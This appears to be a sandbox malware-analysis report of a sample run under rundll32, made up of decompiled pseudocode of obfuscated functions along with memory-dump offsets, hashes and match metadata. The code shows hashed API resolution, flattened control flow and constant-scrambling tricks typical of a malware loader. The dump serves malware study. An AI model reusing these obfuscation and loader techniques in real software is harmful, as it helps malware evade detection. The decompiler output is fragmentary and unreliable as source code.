                                                                                                                                                            				_v32 = 0x537989;
                                                                                                                                                            				_v32 = _v32 + 0xffff7fce;
                                                                                                                                                            				_v32 = _v32 ^ 0x005430a6;
                                                                                                                                                            				_v92 = 0x1586eb;
                                                                                                                                                            				_t255 = 0x27;
                                                                                                                                                            				_v92 = _v92 * 0x18;
                                                                                                                                                            				_v92 = _v92 >> 7;
                                                                                                                                                            				_v92 = _v92 * 0x26;
                                                                                                                                                            				_v92 = _v92 ^ 0x009f543a;
                                                                                                                                                            				_v52 = 0xc32f0b;
                                                                                                                                                            				_v52 = _v52 | 0xcd8d244f;
                                                                                                                                                            				_v52 = _v52 >> 4;
                                                                                                                                                            				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                                                            				_v36 = 0xd9cf6a;
                                                                                                                                                            				_v36 = _v36 / _t255;
                                                                                                                                                            				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                                                            				_v16 = 0xbb623f;
                                                                                                                                                            				_v16 = _v16 ^ 0xe760556d;
                                                                                                                                                            				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                                                            				_v76 = 0x7fa35c;
                                                                                                                                                            				_v76 = _v76 >> 0xa;
                                                                                                                                                            				_v76 = _v76 + 0xffff049d;
                                                                                                                                                            				_v76 = _v76 ^ 0x38c60922;
                                                                                                                                                            				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                                                            				_v80 = 0x34ea16;
                                                                                                                                                            				_v80 = _v80 | 0x70dfffff;
                                                                                                                                                            				_t256 = 0x78;
                                                                                                                                                            				_t257 = _v16;
                                                                                                                                                            				_t260 = _v16;
                                                                                                                                                            				_t224 = _v16;
                                                                                                                                                            				_v80 = _v80 / _t256;
                                                                                                                                                            				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                                                            				_v48 = 0x2ab377;
                                                                                                                                                            				_v48 = _v48 << 0xd;
                                                                                                                                                            				_v48 = _v48 + 0x21bb;
                                                                                                                                                            				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_push(0x5c);
                                                                                                                                                            					while(_t225 != 0xb8820d) {
                                                                                                                                                            						if(_t225 == 0x1effdba) {
                                                                                                                                                            							_t219 = E0037912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                                                            							_t224 = _t219;
                                                                                                                                                            							_t261 =  &(_t261[5]);
                                                                                                                                                            							if(_t219 != 0) {
                                                                                                                                                            								_t225 = 0xb9a00d9;
                                                                                                                                                            								goto L11;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t225 == 0x37f2dd7) {
                                                                                                                                                            								_t225 = 0x43cb3ac;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t225 == 0x43cb3ac) {
                                                                                                                                                            									_t258 =  *0x393e10; // 0x0
                                                                                                                                                            									_t259 = _t258 + 0x1c;
                                                                                                                                                            									while( *_t259 != _t246) {
                                                                                                                                                            										_t259 = _t259 + 2;
                                                                                                                                                            									}
                                                                                                                                                            									_t257 = _t259 + 2;
                                                                                                                                                            									_t225 = 0x1effdba;
                                                                                                                                                            									goto L12;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t225 == 0x5d9bea5) {
                                                                                                                                                            										E00388F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                                                            										_t261 =  &(_t261[3]);
                                                                                                                                                            										_t225 = 0xb8820d;
                                                                                                                                                            										goto L11;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t225 == _t218) {
                                                                                                                                                            											E0037E249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                                                            											_t261 =  &(_t261[3]);
                                                                                                                                                            											_t251 =  !=  ? 1 : _t251;
                                                                                                                                                            											_t225 = 0x5d9bea5;
                                                                                                                                                            											L11:
                                                                                                                                                            											_t246 = 0x5c;
                                                                                                                                                            											L12:
                                                                                                                                                            											_t218 = 0x9850ebe;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t225 != 0xb9a00d9) {
                                                                                                                                                            												L22:
                                                                                                                                                            												if(_t225 != 0x8a80d0f) {
                                                                                                                                                            													continue;
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t260 = E003742C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                                                            												_t261 =  &(_t261[5]);
                                                                                                                                                            												_t218 = 0x9850ebe;
                                                                                                                                                            												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                                                            												goto L1;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						return _t251;
                                                                                                                                                            					}
                                                                                                                                                            					E00388F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                                                            					_t261 =  &(_t261[3]);
                                                                                                                                                            					_t225 = 0x8a80d0f;
                                                                                                                                                            					_t218 = 0x9850ebe;
                                                                                                                                                            					_t246 = 0x5c;
                                                                                                                                                            					goto L22;
                                                                                                                                                            				}
                                                                                                                                                            			}











































                                                                                                                                                            0x00384ac4
                                                                                                                                                            0x00384ac7
                                                                                                                                                            0x00384acc
                                                                                                                                                            0x00384ace
                                                                                                                                                            0x00384acf
                                                                                                                                                            0x00384acf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a67
                                                                                                                                                            0x00384a6d
                                                                                                                                                            0x00384b71
                                                                                                                                                            0x00384b77
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384a73
                                                                                                                                                            0x00384a8f
                                                                                                                                                            0x00384a91
                                                                                                                                                            0x00384a9b
                                                                                                                                                            0x00384aa0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384aa0
                                                                                                                                                            0x00384a6d
                                                                                                                                                            0x00384a65
                                                                                                                                                            0x00384a61
                                                                                                                                                            0x00384a55
                                                                                                                                                            0x00384a49
                                                                                                                                                            0x00384b86
                                                                                                                                                            0x00384b86
                                                                                                                                                            0x00384b5c
                                                                                                                                                            0x00384b61
                                                                                                                                                            0x00384b64
                                                                                                                                                            0x00384b69
                                                                                                                                                            0x00384b70
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384b70

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ^T$mU`
                                                                                                                                                            • API String ID: 0-1245783925
                                                                                                                                                            • Opcode ID: 0858fbecb8954338dccd4e191a9219fdc4a00f79219838bb988fffa924650912
                                                                                                                                                            • Instruction ID: 0ee17e8be298a2f5944489620d213329c214832f339cb002675026f1d2433b76
                                                                                                                                                            • Opcode Fuzzy Hash: 0858fbecb8954338dccd4e191a9219fdc4a00f79219838bb988fffa924650912
                                                                                                                                                            • Instruction Fuzzy Hash: A4B140715083419FC319DF25898A41BFBE1FBC8748F108A1DF69A9A260D3B5CA09CF82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038A666(intOrPtr* __ecx) {
                                                                                                                                                            				char _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				intOrPtr* _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				void* _t185;
                                                                                                                                                            				void* _t187;
                                                                                                                                                            				signed int _t194;
                                                                                                                                                            				signed int _t203;
                                                                                                                                                            				intOrPtr* _t204;
                                                                                                                                                            				signed int _t231;
                                                                                                                                                            				signed int _t232;
                                                                                                                                                            				signed int _t233;
                                                                                                                                                            				signed int _t234;
                                                                                                                                                            				signed int _t235;
                                                                                                                                                            				void* _t236;
                                                                                                                                                            				signed int _t239;
                                                                                                                                                            				signed int* _t240;
                                                                                                                                                            
                                                                                                                                                            				_t204 = __ecx;
                                                                                                                                                            				_t240 =  &_v208;
                                                                                                                                                            				_v144 = __ecx;
                                                                                                                                                            				_v188 = 0x57b051;
                                                                                                                                                            				_v188 = _v188 ^ 0x0e33ee27;
                                                                                                                                                            				_v188 = _v188 * 0x1d;
                                                                                                                                                            				_t236 = 0xac5721c;
                                                                                                                                                            				_v188 = _v188 << 4;
                                                                                                                                                            				_v188 = _v188 ^ 0x15e508b7;
                                                                                                                                                            				_v156 = 0xb3c586;
                                                                                                                                                            				_v156 = _v156 + 0xc4f5;
                                                                                                                                                            				_v156 = _v156 ^ 0x00bed25a;
                                                                                                                                                            				_v168 = 0x711032;
                                                                                                                                                            				_v168 = _v168 << 8;
                                                                                                                                                            				_v168 = _v168 + 0x5169;
                                                                                                                                                            				_v168 = _v168 ^ 0x711dace8;
                                                                                                                                                            				_v192 = 0xa2549d;
                                                                                                                                                            				_v192 = _v192 + 0x52ae;
                                                                                                                                                            				_v192 = _v192 >> 1;
                                                                                                                                                            				_v192 = _v192 >> 3;
                                                                                                                                                            				_v192 = _v192 ^ 0x000eb53b;
                                                                                                                                                            				_v140 = 0xe7e5a1;
                                                                                                                                                            				_t231 = 0x32;
                                                                                                                                                            				_v140 = _v140 * 0x50;
                                                                                                                                                            				_v140 = _v140 ^ 0x4874e895;
                                                                                                                                                            				_v208 = 0x1967bb;
                                                                                                                                                            				_v208 = _v208 << 4;
                                                                                                                                                            				_v208 = _v208 | 0x201d9a42;
                                                                                                                                                            				_v208 = _v208 / _t231;
                                                                                                                                                            				_v208 = _v208 ^ 0x00a7f54f;
                                                                                                                                                            				_v152 = 0x52a7fc;
                                                                                                                                                            				_v152 = _v152 + 0x45a2;
                                                                                                                                                            				_v152 = _v152 ^ 0x0052edd3;
                                                                                                                                                            				_v160 = 0x3027b3;
                                                                                                                                                            				_v160 = _v160 + 0xfd14;
                                                                                                                                                            				_v160 = _v160 ^ 0x0036c553;
                                                                                                                                                            				_v180 = 0x38862e;
                                                                                                                                                            				_v180 = _v180 ^ 0x0f350481;
                                                                                                                                                            				_t232 = 0x7c;
                                                                                                                                                            				_v180 = _v180 * 0x65;
                                                                                                                                                            				_v180 = _v180 ^ 0xf053ee57;
                                                                                                                                                            				_v136 = 0x356a19;
                                                                                                                                                            				_v136 = _v136 ^ 0xbed63dcb;
                                                                                                                                                            				_v136 = _v136 ^ 0xbeeb3706;
                                                                                                                                                            				_v164 = 0x14aaf;
                                                                                                                                                            				_v164 = _v164 + 0xffffc1af;
                                                                                                                                                            				_v164 = _v164 ^ 0x000285a1;
                                                                                                                                                            				_v200 = 0x7f3e04;
                                                                                                                                                            				_v200 = _v200 * 0x53;
                                                                                                                                                            				_v200 = _v200 + 0xffffdc1b;
                                                                                                                                                            				_v200 = _v200 + 0x69f9;
                                                                                                                                                            				_v200 = _v200 ^ 0x2945b47b;
                                                                                                                                                            				_v148 = 0xc6ed1e;
                                                                                                                                                            				_v148 = _v148 >> 6;
                                                                                                                                                            				_v148 = _v148 ^ 0x0006dab0;
                                                                                                                                                            				_v172 = 0x6d07b9;
                                                                                                                                                            				_v172 = _v172 / _t232;
                                                                                                                                                            				_t233 = 0x35;
                                                                                                                                                            				_v172 = _v172 / _t233;
                                                                                                                                                            				_v172 = _v172 ^ 0x00041e3e;
                                                                                                                                                            				_v204 = 0x57aab;
                                                                                                                                                            				_v204 = _v204 + 0xdcdc;
                                                                                                                                                            				_v204 = _v204 * 0x48;
                                                                                                                                                            				_v204 = _v204 << 8;
                                                                                                                                                            				_v204 = _v204 ^ 0xc89fb5e3;
                                                                                                                                                            				_v132 = 0xff84eb;
                                                                                                                                                            				_v132 = _v132 << 5;
                                                                                                                                                            				_v132 = _v132 ^ 0x1ff23c26;
                                                                                                                                                            				_v196 = 0xcb0ee1;
                                                                                                                                                            				_v196 = _v196 | 0xd8d8bfc1;
                                                                                                                                                            				_v196 = _v196 << 4;
                                                                                                                                                            				_v196 = _v196 ^ 0x8dbe7284;
                                                                                                                                                            				_v184 = 0x3f345e;
                                                                                                                                                            				_t234 = 0x7b;
                                                                                                                                                            				_v184 = _v184 * 0x5e;
                                                                                                                                                            				_v184 = _v184 ^ 0x1738d684;
                                                                                                                                                            				_v176 = 0x75d12f;
                                                                                                                                                            				_t239 = _v184;
                                                                                                                                                            				_t203 = _v184;
                                                                                                                                                            				_t235 = _v184;
                                                                                                                                                            				_v176 = _v176 / _t234;
                                                                                                                                                            				_v176 = _v176 + 0xb925;
                                                                                                                                                            				_v176 = _v176 ^ 0x0007fac1;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t185 = 0x80ddafd;
                                                                                                                                                            					do {
                                                                                                                                                            						while(_t236 != 0x3002390) {
                                                                                                                                                            							if(_t236 == _t185) {
                                                                                                                                                            								_push(_v204);
                                                                                                                                                            								_push(_v172);
                                                                                                                                                            								_t187 = E0038DCF7(_v148, 0x371540, __eflags);
                                                                                                                                                            								_push(_t235);
                                                                                                                                                            								_push( &_v128);
                                                                                                                                                            								_push(_t187);
                                                                                                                                                            								_push(_t239);
                                                                                                                                                            								_push(_t203);
                                                                                                                                                            								 *((intOrPtr*)(E0037A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                                            								E0037A8B0(_v132, _t187, _v196);
                                                                                                                                                            								_t236 = 0xc2d90a2;
                                                                                                                                                            								goto L11;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t236 == 0x94501ee) {
                                                                                                                                                            									_t194 = E00380AE0(0x10, 1);
                                                                                                                                                            									_push(_v140);
                                                                                                                                                            									_t239 = _t194;
                                                                                                                                                            									_push( &_v128);
                                                                                                                                                            									_push(_t239);
                                                                                                                                                            									_push(0xb);
                                                                                                                                                            									E003780E3(_v168, _v192);
                                                                                                                                                            									_t236 = 0x3002390;
                                                                                                                                                            									L11:
                                                                                                                                                            									_t240 =  &(_t240[6]);
                                                                                                                                                            									L12:
                                                                                                                                                            									_t204 = _v144;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t236 == 0xac5721c) {
                                                                                                                                                            										_t236 = 0x94501ee;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t236 == 0xc2d90a2) {
                                                                                                                                                            											E00388519(_v184, _v176, _t235);
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t236 != 0xd4e1cec) {
                                                                                                                                                            												goto L17;
                                                                                                                                                            											} else {
                                                                                                                                                            												_t239 = 0x4000;
                                                                                                                                                            												_push(_t204);
                                                                                                                                                            												_push(_t204);
                                                                                                                                                            												_t203 = E00377FF2(0x4000);
                                                                                                                                                            												_t185 = 0x80ddafd;
                                                                                                                                                            												_t204 = _v144;
                                                                                                                                                            												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
                                                                                                                                                            												continue;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							L20:
                                                                                                                                                            							return _t203;
                                                                                                                                                            						}
                                                                                                                                                            						_t235 = E00374816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
                                                                                                                                                            						_t240 =  &(_t240[4]);
                                                                                                                                                            						__eflags = _t235;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							_t204 = _v144;
                                                                                                                                                            							_t236 = 0x99c1651;
                                                                                                                                                            							_t185 = 0x80ddafd;
                                                                                                                                                            							goto L17;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t236 = 0xd4e1cec;
                                                                                                                                                            							goto L12;
                                                                                                                                                            						}
                                                                                                                                                            						goto L20;
                                                                                                                                                            						L17:
                                                                                                                                                            						__eflags = _t236 - 0x99c1651;
                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                            					goto L20;
                                                                                                                                                            				}
                                                                                                                                                            			}





































                                                                                                                                                            0x0038a977
                                                                                                                                                            0x0038a97a
                                                                                                                                                            0x0038a97a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a8ec
                                                                                                                                                            0x0038a8f2
                                                                                                                                                            0x0038a93f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a8f4
                                                                                                                                                            0x0038a8fa
                                                                                                                                                            0x0038aa1d
                                                                                                                                                            0x0038a900
                                                                                                                                                            0x0038a906
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a90c
                                                                                                                                                            0x0038a910
                                                                                                                                                            0x0038a91f
                                                                                                                                                            0x0038a920
                                                                                                                                                            0x0038a926
                                                                                                                                                            0x0038a930
                                                                                                                                                            0x0038a936
                                                                                                                                                            0x0038a93a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a93a
                                                                                                                                                            0x0038a906
                                                                                                                                                            0x0038a8fa
                                                                                                                                                            0x0038a8f2
                                                                                                                                                            0x0038a8ea
                                                                                                                                                            0x0038aa26
                                                                                                                                                            0x0038aa2f
                                                                                                                                                            0x0038aa2f
                                                                                                                                                            0x0038a9e8
                                                                                                                                                            0x0038a9ea
                                                                                                                                                            0x0038a9ed
                                                                                                                                                            0x0038a9ef
                                                                                                                                                            0x0038a9f8
                                                                                                                                                            0x0038a9fc
                                                                                                                                                            0x0038aa01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038aa12

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ^4?$iQ
                                                                                                                                                            • API String ID: 0-3971506469
                                                                                                                                                            • Opcode ID: f1484d1be04cb0755c3c51ebf2b8c2ac789e0f84743a2339c0737415eeda01c6
                                                                                                                                                            • Instruction ID: 96217a39bdc5d9392793f20f4e271625f7ff46d66880ff0382e14469f81739df
                                                                                                                                                            • Opcode Fuzzy Hash: f1484d1be04cb0755c3c51ebf2b8c2ac789e0f84743a2339c0737415eeda01c6
                                                                                                                                                            • Instruction Fuzzy Hash: 19A162719083409FD354DF29C58990BFBE0BBC4718F41892EF99AAA260C7B5D949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E00388BE3() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				void* _v88;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				signed int _t203;
                                                                                                                                                            				short _t206;
                                                                                                                                                            				short _t211;
                                                                                                                                                            				signed int _t214;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				intOrPtr _t238;
                                                                                                                                                            				void* _t239;
                                                                                                                                                            				void* _t240;
                                                                                                                                                            				short* _t241;
                                                                                                                                                            				short* _t242;
                                                                                                                                                            				signed int _t243;
                                                                                                                                                            				signed int _t244;
                                                                                                                                                            				signed int _t245;
                                                                                                                                                            				signed int _t246;
                                                                                                                                                            				signed int _t247;
                                                                                                                                                            				signed int _t248;
                                                                                                                                                            				signed int _t249;
                                                                                                                                                            				signed int _t250;
                                                                                                                                                            				void* _t251;
                                                                                                                                                            
                                                                                                                                                            				_v92 = 0x476c75;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t216 = 0xb7209d2;
                                                                                                                                                            				_t243 = 0x73;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t238 =  *0x393e10; // 0x0
                                                                                                                                                            				_v16 = 0xe95677;
                                                                                                                                                            				_t239 = _t238 + 0x1c;
                                                                                                                                                            				_v16 = _v16 + 0xffffde88;
                                                                                                                                                            				_v16 = _v16 | 0xcd71b475;
                                                                                                                                                            				_v16 = _v16 + 0xffffb9cf;
                                                                                                                                                            				_v16 = _v16 ^ 0xcdf0e35f;
                                                                                                                                                            				_v48 = 0xdf79ef;
                                                                                                                                                            				_v48 = _v48 / _t243;
                                                                                                                                                            				_t244 = 0x6b;
                                                                                                                                                            				_v48 = _v48 * 0x6d;
                                                                                                                                                            				_v48 = _v48 ^ 0x00d012e0;
                                                                                                                                                            				_v20 = 0x9de8b4;
                                                                                                                                                            				_v20 = _v20 + 0xffff612d;
                                                                                                                                                            				_v20 = _v20 / _t244;
                                                                                                                                                            				_v20 = _v20 ^ 0xc642351f;
                                                                                                                                                            				_v20 = _v20 ^ 0xc646a40f;
                                                                                                                                                            				_v52 = 0x8fb5bf;
                                                                                                                                                            				_v52 = _v52 << 0xa;
                                                                                                                                                            				_v52 = _v52 | 0x07a5acc8;
                                                                                                                                                            				_v52 = _v52 ^ 0x3ff13d54;
                                                                                                                                                            				_v68 = 0x5451dc;
                                                                                                                                                            				_v68 = _v68 << 4;
                                                                                                                                                            				_v68 = _v68 ^ 0x054b95e9;
                                                                                                                                                            				_v56 = 0x52bd8b;
                                                                                                                                                            				_v56 = _v56 >> 2;
                                                                                                                                                            				_t245 = 0x43;
                                                                                                                                                            				_v56 = _v56 * 0x7a;
                                                                                                                                                            				_v56 = _v56 ^ 0x09d97bb2;
                                                                                                                                                            				_v24 = 0x3d3b88;
                                                                                                                                                            				_v24 = _v24 / _t245;
                                                                                                                                                            				_v24 = _v24 + 0xfffff551;
                                                                                                                                                            				_v24 = _v24 ^ 0x58fd9949;
                                                                                                                                                            				_v24 = _v24 ^ 0x58f7485b;
                                                                                                                                                            				_v28 = 0x8d7fa4;
                                                                                                                                                            				_v28 = _v28 | 0x74f1f66b;
                                                                                                                                                            				_v28 = _v28 + 0xbcb0;
                                                                                                                                                            				_t246 = 0x1d;
                                                                                                                                                            				_v28 = _v28 / _t246;
                                                                                                                                                            				_v28 = _v28 ^ 0x0406308a;
                                                                                                                                                            				_v76 = 0xb13dbd;
                                                                                                                                                            				_v76 = _v76 >> 4;
                                                                                                                                                            				_v76 = _v76 ^ 0x0001a54a;
                                                                                                                                                            				_v72 = 0x3dff58;
                                                                                                                                                            				_v72 = _v72 + 0xffff5d9c;
                                                                                                                                                            				_v72 = _v72 ^ 0x00301633;
                                                                                                                                                            				_v8 = 0xd63a62;
                                                                                                                                                            				_v8 = _v8 >> 4;
                                                                                                                                                            				_v8 = _v8 << 5;
                                                                                                                                                            				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                                                            				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                                                            				_v44 = 0x6f20d8;
                                                                                                                                                            				_v44 = _v44 >> 0xb;
                                                                                                                                                            				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                                                            				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                                                            				_v64 = 0x5810b3;
                                                                                                                                                            				_t247 = 0x3e;
                                                                                                                                                            				_v64 = _v64 * 0x13;
                                                                                                                                                            				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                                                            				_v60 = 0xa1705b;
                                                                                                                                                            				_v60 = _v60 / _t247;
                                                                                                                                                            				_v60 = _v60 ^ 0x000746d3;
                                                                                                                                                            				_v12 = 0xe49076;
                                                                                                                                                            				_v12 = _v12 | 0xf94b921d;
                                                                                                                                                            				_t248 = 0x66;
                                                                                                                                                            				_v12 = _v12 / _t248;
                                                                                                                                                            				_v12 = _v12 | 0x30c6fb91;
                                                                                                                                                            				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                                                            				_v40 = 0x4af1f5;
                                                                                                                                                            				_v40 = _v40 + 0xffff1f3a;
                                                                                                                                                            				_v40 = _v40 + 0x5998;
                                                                                                                                                            				_v40 = _v40 | 0x0efc634a;
                                                                                                                                                            				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                                                            				_v36 = 0xca0e2e;
                                                                                                                                                            				_v36 = _v36 + 0xa6ab;
                                                                                                                                                            				_v36 = _v36 * 0x17;
                                                                                                                                                            				_v36 = _v36 | 0xed84f45f;
                                                                                                                                                            				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                                                            				_v32 = 0x9f068d;
                                                                                                                                                            				_v32 = _v32 | 0xccdcedf7;
                                                                                                                                                            				_v32 = _v32 >> 8;
                                                                                                                                                            				_v32 = _v32 << 0x10;
                                                                                                                                                            				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t216 != 0x5ccdb59) {
                                                                                                                                                            						if(_t216 == 0x80e5149) {
                                                                                                                                                            							_push(_v32);
                                                                                                                                                            							_push(_t239);
                                                                                                                                                            							_push(3);
                                                                                                                                                            							_push(1);
                                                                                                                                                            							E003780E3(_v40, _v36);
                                                                                                                                                            							 *((short*)(_t239 + 6)) = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t216 == 0xb7209d2) {
                                                                                                                                                            							_t211 = E0038D25E(_t216);
                                                                                                                                                            							_t216 = 0x5ccdb59;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t216 != 0xeb2e9e3) {
                                                                                                                                                            							goto L8;
                                                                                                                                                            						}
                                                                                                                                                            						_t214 = E00380AE0(0x10, 4);
                                                                                                                                                            						_push(_v12);
                                                                                                                                                            						_t250 = _t214;
                                                                                                                                                            						_push(_t239);
                                                                                                                                                            						_push(_t250);
                                                                                                                                                            						_push(1);
                                                                                                                                                            						E003780E3(_v64, _v60);
                                                                                                                                                            						_t251 = _t251 + 0x18;
                                                                                                                                                            						_t242 = _t239 + _t250 * 2;
                                                                                                                                                            						_t216 = 0x80e5149;
                                                                                                                                                            						_t211 = 0x2e;
                                                                                                                                                            						 *_t242 = _t211;
                                                                                                                                                            						_t239 = _t242 + 2;
                                                                                                                                                            					}
                                                                                                                                                            					_t203 = E00380AE0(0x10, 4);
                                                                                                                                                            					_push(_v24);
                                                                                                                                                            					_t249 = _t203;
                                                                                                                                                            					_push(_t239);
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_push(2);
                                                                                                                                                            					E003780E3(_v68, _v56);
                                                                                                                                                            					_push(_v72);
                                                                                                                                                            					_t240 = _t239 + 2;
                                                                                                                                                            					_push(_t240);
                                                                                                                                                            					_push(_t249);
                                                                                                                                                            					_push(1);
                                                                                                                                                            					E003780E3(_v28, _v76);
                                                                                                                                                            					_t251 = _t251 + 0x28;
                                                                                                                                                            					_t241 = _t240 + _t249 * 2;
                                                                                                                                                            					_t216 = 0xeb2e9e3;
                                                                                                                                                            					_t206 = 0x5c;
                                                                                                                                                            					 *_t241 = _t206;
                                                                                                                                                            					_t239 = _t241 + 2;
                                                                                                                                                            					L8:
                                                                                                                                                            				} while (_t216 != 0x3f21c37);
                                                                                                                                                            				return _t211;
                                                                                                                                                            			}
                                                                                                                                                            0x00388e69
                                                                                                                                                            0x00388e6b
                                                                                                                                                            0x00388e70
                                                                                                                                                            0x00388e73
                                                                                                                                                            0x00388e76
                                                                                                                                                            0x00388e7d
                                                                                                                                                            0x00388e7e
                                                                                                                                                            0x00388e81
                                                                                                                                                            0x00388e81
                                                                                                                                                            0x00388ea2
                                                                                                                                                            0x00388ea7
                                                                                                                                                            0x00388ead
                                                                                                                                                            0x00388eb2
                                                                                                                                                            0x00388eb3
                                                                                                                                                            0x00388eb5
                                                                                                                                                            0x00388eb7
                                                                                                                                                            0x00388ebc
